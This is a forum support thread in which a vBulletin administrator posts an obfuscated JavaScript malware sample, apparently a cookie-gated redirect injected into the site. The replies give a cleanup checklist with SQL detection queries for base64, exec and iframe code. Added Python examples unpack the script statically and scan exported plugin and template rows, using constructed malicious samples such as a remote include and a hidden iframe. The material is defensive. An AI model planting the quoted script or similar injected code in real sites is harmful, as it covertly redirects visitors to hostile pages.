How to Get rid of this Malware?

  • Neutral Singh
    Senior Member
    • Sep 2004
    • 232
    • 3.8.x

    How to Get rid of this Malware?

    Known javascript malware. Details: http://sucuri.net/malware/entry/MW:JSEPACK
    <html><head></head><body><script type="text/javascript">var ipbs='ad5fab0b';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i a=["\\r\\d\\c\\k\\b\\y\\d","\\m\\d\\c\\k\\b\\y\\d","\\x\\z\\d\\M\\g\\b\\l\\d\\m\\j","\\c\\e\\ K\\I\\k\\D\\c\\l\\b\\n\\r","\\v\\e\\e\\F\\b\\d","\\j","\\x\\z\\g\\w\\c\\p\\j\\f","\\b\\g\\ C\\m","\\t","\\q\\e\\v\\w\\c\\b\\e\\n","\\p\\c\\c\\g\\E\\f\\f\\G\\l\\q\\t\\S\\H\\P\\b\\n\\ R\\e\\f"];O s(A,o){i h=N J();h[a[1]](h[a[0]]()+L);i u=a[2]+h[a[3]]();B[a[4]]=A+a[5]+o+u+a[6]};s(a[7],a[8]);B[a[9]]=a[T]+Q;',56,56,'||||||||||_0x12bb|x69|x74|x65|x6F|x2F|x70|_0x102ex4|var|x3D|x54|x72|x73|x6E|_0 x102ex3|x68|x6C|x67|ipbcc|x31|_0x102ex5|x63|x61|x3B|x6D|x20|_0x102ex2|document|x62|x53|x3A |x6B|x75|x33|x4D|Date|x47|86400000|x78|new|function|x2E|ipbs|x66|x32|10'.split('|'),0,{})) </script></body></html
    Is there any tool which tells us which script is being triggered whenever someone clicks on my website link in a search engine? I have read a few threads but nobody has finally proclaimed that the issue has been resolved. I have upgraded to the latest in the vb3 series + vbSEO is also up-to-date. If I am asked to look into the plugins then what should I look for in the plugins?

    How to get rid of this malware?

    Thanks
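    Added example, not part of the original post: a small Python unpacker for the eval(function(p,a,c,k,e,d){...}) wrapper that the posted script uses. It never evaluates the JavaScript; it replays the substitution the wrapper's own bootstrap performs (each \b\w+\b token of the payload is looked up in the keyword table) with regular expressions, then decodes the \xNN escapes so the string table becomes readable, and lists the string literals a reviewer would look at first. The packed input it ships with is a constructed sample of the same shape as the posted one (a hex-escaped string table, a cookie write, then a document.location assignment; the posted keyword list already shows document, Date and 86400000, a day in milliseconds), pointing at the reserved name example.invalid. The same function can be fed the posted text once the stray spaces the forum rendering inserted inside tokens (for example in "_0 x102ex3") are removed. Function names and the sample are mine.

```python
"""Static unpacker for the eval(function(p,a,c,k,e,d){...}) wrapper (added example).
Nothing here runs JavaScript: the token substitution the wrapper performs at runtime
is replayed with regular expressions, then hex escapes are decoded so the script's
string table can be read."""
import re

_BASE36 = "0123456789abcdefghijklmnopqrstuvwxyz"


def encode_index(c: int, base: int) -> str:
    """Replay the packer's e() function: keyword index -> short token."""
    prefix = "" if c < base else encode_index(c // base, base)
    c %= base
    return prefix + (chr(c + 29) if c > 35 else _BASE36[c])


# Matches the tail of the wrapper: }('payload',base,count,'k|e|y|s'.split('|')
_CALL_RE = re.compile(
    r"\}\('((?:[^'\\]|\\.)*)',\s*(\d+),\s*(\d+),\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)",
    re.S,
)


def unpack(packed: str) -> str:
    """Return the source the wrapper would hand to eval(), without evaluating it."""
    m = _CALL_RE.search(packed)
    if not m:
        raise ValueError("no p,a,c,k,e,d call found")
    payload, base, count, keywords = m.group(1), int(m.group(2)), int(m.group(3)), m.group(4)
    # Undo the escaping of the single-quoted JS literal (the packer only emits \\ and \').
    payload = payload.replace("\\'", "'").replace("\\\\", "\\")
    words = keywords.split("|")
    table = {}
    for c in range(count):
        token = encode_index(c, base)
        table[token] = words[c] if c < len(words) and words[c] else token
    # The bootstrap replaces every \b\w+\b token of the payload through this table.
    return re.sub(r"\b\w+\b", lambda w: table.get(w.group(0), w.group(0)),
                  payload, flags=re.ASCII)


def decode_hex_escapes(js: str) -> str:
    """Turn \\xNN escapes into characters; the sample's string table is built of them."""
    return re.sub(r"\\x([0-9A-Fa-f]{2})", lambda h: chr(int(h.group(1), 16)), js)


def string_literals(js: str) -> list:
    """Quoted literals of the decoded script: what a reviewer reads first."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in re.finditer(r'"([^"\\]*)"|\'([^\'\\]*)\'', js)]


# Constructed packed sample with the same shape as the posted one (cookie write,
# then a document.location assignment); the target is the reserved name example.invalid.
SAMPLE = (
    r"""eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))"""
    r"""+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};"""
    r"""if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];"""
    r"""e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}"""
    r"""return p}('b i=["\\2\\3\\3\\4\\5\\6","\\7\\3\\2\\8\\9\\5\\3\\a"];"""
    r"""c[i[0]]="d=1; e=/";c[i[1]]="f://g.h/"+d;',36,19,"""
    r"""'||x63|x6F|x6B|x69|x65|x6C|x61|x74|x6E|var|document|ipbs|path|http|example|invalid|s'.split('|'),0,{}))"""
)

if __name__ == "__main__":
    decoded = decode_hex_escapes(unpack(SAMPLE))
    print(decoded)
    print(string_literals(decoded))
```

    The decoded sample reads `var s=["cookie","location"];document[s[0]]="ipbs=1; path=/";document[s[1]]="http://example.invalid/"+ipbs;`, which is the shape to expect from the posted script too: a cookie so a visitor is only redirected once, then the redirect itself. The base-56 token alphabet used by the posted sample (digits, a-z, then A-T) is handled by encode_index the same way the wrapper's e() handles it.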

  • stevectaylor
    Senior Member
    • Aug 2007
    • 380
    • 3.6.x

    #2
    We got this one also!
    Holiday Forum
    Motor Car Forum
    Political Forum
    Web Hosting Forum


    • Trevor Hannant
      vBulletin Support
      • Aug 2002
      • 24358
      • 5.7.X

      #3
      To check a site for compromises follow these steps:

      1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

      2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

      3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

      4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you. See step #7

      5) Check your plugins for any base64 code. I recommend against using any plugins or products that include base64 code in them. However, some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

      6) Make sure that your plugins do not include calls to exec(), system(), or passthru() or iframes. These are also often signs of a hacked site.

      The following query can be run in phpMyAdmin and will provide results for steps 5 and 6 -
      SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode LIKE '%passthru%' OR phpcode LIKE '%iframe%';

      If you have a plugin that you can't read or the code is obfuscated then you should probably contact the addon author. If it is assigned to the vBulletin, vBulletin CMS, vBulletin Blog or Skimlink products, delete it.

      7) Using PHPMyAdmin run this query:
      SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template LIKE '%passthru%' OR template LIKE '%iframe%';

      It checks the templates for compromising code. You will need to review the results from this. If you can't read it or the code is obfuscated then you should revert the template in the Admin CP.

      8) Check .htaccess to make sure there are no redirects there.

      9) Check all plugins in reference to cache or cookies. If they are similar to any of the above, delete them.
      Vote for:

      - Admin Settable Paid Subscription Reminder Timeframe (vB6)
      - Add Admin ability to auto-subscribe users to specific channel(s) (vB6)
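      Added example, not from the thread: a Python script that applies the checks from steps 3 to 8 above offline, to rows exported from the plugin and template tables (a phpMyAdmin export, for instance; the export step is an assumption) and to the .htaccess text. like_hits() reproduces the substring tests of the two queries, which is also where their main weakness shows: LIKE '%exec%' matches the word "executed" in a comment, and LIKE '%system%' matches "filesystem". The stricter patterns are my own refinement, not part of the checklist: they look for an actual base64_decode()/exec()/system()/passthru() call or an iframe tag, and additionally for an include or require whose target is a URL (step 4), which the LIKE queries do not cover. Iframes in the templates step 3 lists are reported as expected rather than suspicious. All rows, the .htaccess text and the names used are constructed.

```python
"""Offline version of the plugin, template and .htaccess checks from the checklist
above (added example). Rows are dicts shaped like the plugin and template tables;
every row and the .htaccess text here is constructed, not real forum data."""
import re

# Substrings tested by the two phpMyAdmin queries; LIKE '%term%' is case-insensitive
# on vBulletin's usual collations, so the comparison is done on lower-cased text.
LIKE_TERMS = ("base64", "exec", "system", "passthru", "iframe")

# Templates in which step 3 says an iframe tag is expected.
IFRAME_EXPECTED = frozenset({
    "bbcode_video", "editor-ie.css", "member.css", "stylegenerator.css", "vbcms.css",
    "vbulletin.css", "help_bbcodes", "humanverify_recaptcha", "search_common",
    "search_common_select_type",
})

# Stricter patterns (my refinement, not part of the checklist): a real call or tag
# rather than the same letters inside another word, plus include/require of a URL.
STRICT_PATTERNS = {
    "base64": re.compile(r"\bbase64_(?:de|en)code\s*\(", re.I),
    "exec": re.compile(r"(?<![\w$])(?:shell_)?exec\s*\(", re.I),
    "system": re.compile(r"(?<![\w$])system\s*\(", re.I),
    "passthru": re.compile(r"(?<![\w$])passthru\s*\(", re.I),
    "iframe": re.compile(r"<\s*iframe\b", re.I),
    "include": re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]\s*(?:https?|ftp):", re.I),
}


def like_hits(code):
    """What the SELECT ... LIKE queries would report for this row's code."""
    lower = code.lower()
    return [term for term in LIKE_TERMS if term in lower]


def strict_hits(code):
    return [name for name, pat in STRICT_PATTERNS.items() if pat.search(code)]


def scan_rows(rows, field, iframe_allowlist=frozenset()):
    """field is 'phpcode' for plugin rows and 'template' for template rows."""
    findings = []
    for row in rows:
        code = row.get(field) or ""
        loose, strict = like_hits(code), strict_hits(code)
        if not loose and not strict:
            continue
        real = [h for h in strict if not (h == "iframe" and row.get("title") in iframe_allowlist)]
        if real:
            verdict = "review"
        elif strict:
            verdict = "expected"  # iframe in one of the templates step 3 lists
        else:
            verdict = "probable false positive"  # e.g. "executed" in a comment
        findings.append({"title": row.get("title"), "product": row.get("product"),
                         "like": loose, "strict": strict, "verdict": verdict})
    return findings


def htaccess_redirects(text):
    """Step 8: Redirect* directives and RewriteRule lines carrying an R flag."""
    hits = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if re.match(r"Redirect(?:Match|Permanent|Temp)?\b", s, re.I):
            hits.append(s)
        elif s.lower().startswith("rewriterule") and re.search(r"\[[^\]]*\bR(?:=\d{3})?\b[^\]]*\]", s):
            hits.append(s)
    return hits


PLUGINS = [  # constructed rows; the base64 payload decodes to the harmless echo 'hi';
    {"title": "Post Counter", "hookname": "postbit_display_complete", "product": "vbulletin",
     "phpcode": "// executed once per post\n$post['counter'] += 1;"},
    {"title": "Cache Warmer", "hookname": "global_start", "product": "vbulletin",
     "phpcode": "eval(base64_decode('ZWNobyAnaGknOw=='));"},
    {"title": "Branded Footer", "hookname": "parse_templates", "product": "lite_addon",
     "phpcode": "$footer = base64_decode($licensed_footer);"},
    {"title": "Remote Loader", "hookname": "init_startup", "product": "vbulletin",
     "phpcode": "include('http://example.invalid/loader.txt');"},
]
TEMPLATES = [  # constructed rows
    {"styleid": 1, "title": "footer", "template": '<div class="footer">$vboptions[copyright]</div>'},
    {"styleid": 1, "title": "header",
     "template": '<iframe src="http://example.invalid/c.php" width="1" height="1"></iframe>'},
    {"styleid": 2, "title": "bbcode_video", "template": '<iframe src="$url" frameborder="0"></iframe>'},
]
HTACCESS = """# constructed sample .htaccess
RewriteEngine On
RewriteRule ^forum/(.*)$ showthread.php?t=$1 [L]
Redirect 302 /old http://example.invalid/new
RewriteRule .* http://example.invalid/go.php [R=302,L]
"""

if __name__ == "__main__":
    for f in scan_rows(PLUGINS, "phpcode") + scan_rows(TEMPLATES, "template", IFRAME_EXPECTED):
        print(f"{f['verdict']:24} {f['title']:16} LIKE={f['like']} strict={f['strict']}")
    for line in htaccess_redirects(HTACCESS):
        print("htaccess redirect:", line)
```

      On the constructed rows the "Post Counter" plugin is flagged by the LIKE test only (the word "executed"), the branded addon with its base64_decode() lands in "review" exactly as step 5 says it needs a personal call, and the remote include is missed by the queries but caught by the stricter pattern. Whatever the verdict, the row itself still has to be read: the patterns narrow the list, they do not replace the review in steps 5 to 7.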
